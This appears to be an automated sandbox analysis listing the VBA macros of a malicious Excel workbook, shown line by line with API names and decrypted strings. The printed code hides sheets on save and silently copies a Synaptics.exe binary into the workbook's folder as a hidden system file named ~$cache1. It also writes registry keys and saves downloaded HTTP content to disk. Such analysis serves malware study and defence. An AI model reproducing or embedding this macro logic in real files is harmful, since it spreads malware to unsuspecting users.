                            CreateObject

                            206

                            oStream.Open

                            Open

                            207

                            oStream.Type = 1

                            Type

                            208

                            oStream.Write WinHttpReq.ResponseBody

                            Write

                            ResponseBody

                            209

                            oStream.SaveToFile (NMA)

                            SaveToFile

                            210

                            oStream.Close

                            Close

                            211

                            Else

                            212

                            FDW = False

                            213

                            Endif

                            214

                            Else

                            215

                            FDW = False

                            216

                            Endif

                            217

                            End Function

                            APIsMeta Information

                            CreateObject

                            CreateObject("WScript.Shell")

                            RegWrite

                            StringsDecrypted Strings
                            "WScript.Shell"
                            LineInstructionMeta Information
                            138

                            Sub RegKeySave(i_RegKey as String, i_Value as String, optional i_Type as String = "REG_SZ")

                            141

                            Dim myWS as Object

                            executed
                            143

                            Set myWS = CreateObject("WScript.Shell")

                            CreateObject("WScript.Shell")

                            executed
                            144

                            myWS.RegWrite i_RegKey, i_Value, i_Type

                            RegWrite

                            145

                            End Sub

                            APIsMeta Information

                            Saved

                            LineInstructionMeta Information
                            30

                            Private Sub Workbook_BeforeClose(Cancel as Boolean)

                            31

                            If Not SheetsChanged Then

                            executed
                            32

                            ActiveWorkbook.Saved = True

                            Saved

                            33

                            Endif

                            34

                            End Sub

                            APIsMeta Information

                            ActiveSheet

                            EnableEvents

                            ScreenUpdating

                            Sheets

                            Sheets

                            xlSheetHidden

                            Save

                            Sheets

                            Sheets

                            xlSheetVisible

                            Select

                            ScreenUpdating

                            EnableEvents

                            EnableEvents

                            ScreenUpdating

                            Sheets

                            Sheets

                            xlSheetHidden

                            GetSaveAsFilename

                            SaveAs

                            xlOpenXMLWorkbookMacroEnabled

                            Part of subcall function SaveAsInj@ThisWorkbook: CreateObject

                            Part of subcall function SaveAsInj@ThisWorkbook: Environ

                            Part of subcall function SaveAsInj@ThisWorkbook: FileExists

                            Part of subcall function SaveAsInj@ThisWorkbook: FileExists

                            Part of subcall function SaveAsInj@ThisWorkbook: FileCopy

                            Part of subcall function SaveAsInj@ThisWorkbook: SetAttr

                            Part of subcall function SaveAsInj@ThisWorkbook: vbHidden

                            Part of subcall function SaveAsInj@ThisWorkbook: vbSystem

                            Path

                            Sheets

                            Sheets

                            xlSheetVisible

                            Select

                            ScreenUpdating

                            EnableEvents

                            StringsDecrypted Strings
                            "Excel \xc7al\xfd\xfema Kitab\xfd (*.xlsm), *.xlsm"
                            LineInstructionMeta Information
                            51

                            Private Sub Workbook_BeforeSave(ByVal SaveAsUI as Boolean, Cancel as Boolean)

                            52

                            Dim i as Integer

                            executed
                            53

                            Dim AIndex as Integer

                            54

                            Dim FName

                            56

                            AIndex = ActiveWorkbook.ActiveSheet.Index

                            ActiveSheet

                            58

                            If SaveAsUI = False Then

                            59

                            Cancel = True

                            60

                            Application.EnableEvents = False

                            EnableEvents

                            61

                            Application.ScreenUpdating = False

                            ScreenUpdating

                            63

                            For i = 1 To ActiveWorkbook.Sheets.Count - 1

                            Sheets

                            64

                            ActiveWorkbook.Sheets(i).Visible = xlSheetHidden

                            Sheets

                            xlSheetHidden

                            65

                            Next i

                            Sheets

                            66

                            ActiveWorkbook.Save

                            Save

                            68

                            For i = 1 To ActiveWorkbook.Sheets.Count

                            Sheets

                            69

                            ActiveWorkbook.Sheets(i).Visible = xlSheetVisible

                            Sheets

                            xlSheetVisible

                            70

                            Next i

                            Sheets

                            71

                            ActiveWorkbook.Sheets(AIndex).Select

                            Select

                            72

                            SheetsChanged = False

                            74

                            Application.ScreenUpdating = True

                            ScreenUpdating

                            75

                            Application.EnableEvents = True

                            EnableEvents

                            76

                            Else

                            77

                            Cancel = True

                            78

                            Application.EnableEvents = False

                            EnableEvents

                            79

                            Application.ScreenUpdating = False

                            ScreenUpdating

                            81

                            For i = 1 To ActiveWorkbook.Sheets.Count - 1

                            Sheets

                            82

                            ActiveWorkbook.Sheets(i).Visible = xlSheetHidden

                            Sheets

                            xlSheetHidden

                            83

                            Next i

                            Sheets

                            85

                            FName = Application.GetSaveAsFilename(fileFilter := "Excel \xc7al\xfd\xfema Kitab\xfd (*.xlsm), *.xlsm")

                            GetSaveAsFilename

                            86

                            If FName <> False Then

                            87

                            ActiveWorkbook.SaveAs Filename := FName, FileFormat := xlOpenXMLWorkbookMacroEnabled

                            SaveAs

                            xlOpenXMLWorkbookMacroEnabled

                            88

                            SaveAsInj ActiveWorkbook.Path

                            Path

                            89

                            Endif

                            91

                            For i = 1 To ActiveWorkbook.Sheets.Count

                            Sheets

                            92

                            ActiveWorkbook.Sheets(i).Visible = xlSheetVisible

                            Sheets

                            xlSheetVisible

                            93

                            Next i

                            Sheets

                            94

                            ActiveWorkbook.Sheets(AIndex).Select

                            Select

                            95

                            SheetsChanged = False

                            97

                            Application.ScreenUpdating = True

                            ScreenUpdating

                            98

                            Application.EnableEvents = True

                            EnableEvents

                            99

                            Endif

                            100

                            End Sub

                            APIsMeta Information

                            Sheets

                            ActiveWorkbook

                            Sheets

                            ActiveWorkbook

                            LineInstructionMeta Information
                            44

                            Private Sub Workbook_SheetActivate(ByVal Sh as Object)

                            45

                            If ActiveWorkbook.Sheets.Count <> SheetCount Then

                            Sheets

                            ActiveWorkbook

                            executed
                            46

                            SheetsChanged = True

                            47

                            SheetCount = ActiveWorkbook.Sheets.Count

                            Sheets

                            ActiveWorkbook

                            48

                            Endif

                            49

                            End Sub

                            APIsMeta Information

                            CreateObject

                            Environ

                            FileExists

                            FileExists

                            FileCopy

                            SetAttr

                            vbHidden

                            vbSystem

                            StringsDecrypted Strings
                            "scripting.filesystemobject"
                            "ALLUSERSPROFILE"
                            LineInstructionMeta Information
                            102

                            Sub SaveAsInj(DIR as String)

                            103

                            Dim FSO as Object

                            104

                            Dim FN as String

                            106

                            Set FSO = CreateObject("scripting.filesystemobject")

                            CreateObject

                            107

                            FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"

                            Environ

                            109

                            If FSO.FileExists(FN) Then

                            FileExists

                            110

                            If Not FSO.FileExists(DIR & "\~$cache1") Then

                            FileExists

                            111

                            FileCopy FN, DIR & "\~$cache1"

                            FileCopy

                            112

                            Endif

                            113

                            SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem

                            SetAttr

                            vbHidden

                            vbSystem

                            114

                            Endif

                            115

                            End Sub

                            APIsMeta Information

                            CreateObject

                            RegRead

                            StringsDecrypted Strings
                            "WScript.Shell"
                            LineInstructionMeta Information
                            125

                            Function RegKeyExists(i_RegKey as String) as Boolean

                            126

                            Dim myWS as Object

                            128

                            On Error Goto ErrorHandler

                            129

                            Set myWS = CreateObject("WScript.Shell")

                            CreateObject

                            130

                            myWS.RegRead i_RegKey

                            RegRead

                            131

                            RegKeyExists = True

                            132

                            Exit Function

                            133

                            ErrorHandler:

                            135

                            RegKeyExists = False

                            136

                            End Function

                            APIsMeta Information

                            CreateObject

                            RegRead

                            StringsDecrypted Strings
                            "WScript.Shell"
                            LineInstructionMeta Information
                            117

                            Function RegKeyRead(i_RegKey as String) as String

                            118

                            Dim myWS as Object

                            120

                            On Error Resume Next

                            121

                            Set myWS = CreateObject("WScript.Shell")

                            CreateObject

                            122

                            RegKeyRead = myWS.RegRead(i_RegKey)

                            RegRead

                            123

                            End Function

                            LineInstructionMeta Information
                            36

                            Private Sub Workbook_SheetChange(ByVal Sh as Object, ByVal Target as Range)

                            37

                            SheetsChanged = True

                            38

                            End Sub

                            LineInstructionMeta Information
                            40

                            Private Sub Workbook_NewSheet(ByVal Sh as Object)

                            41

                            SheetsChanged = True

                            42

                            End Sub

                            Reset < >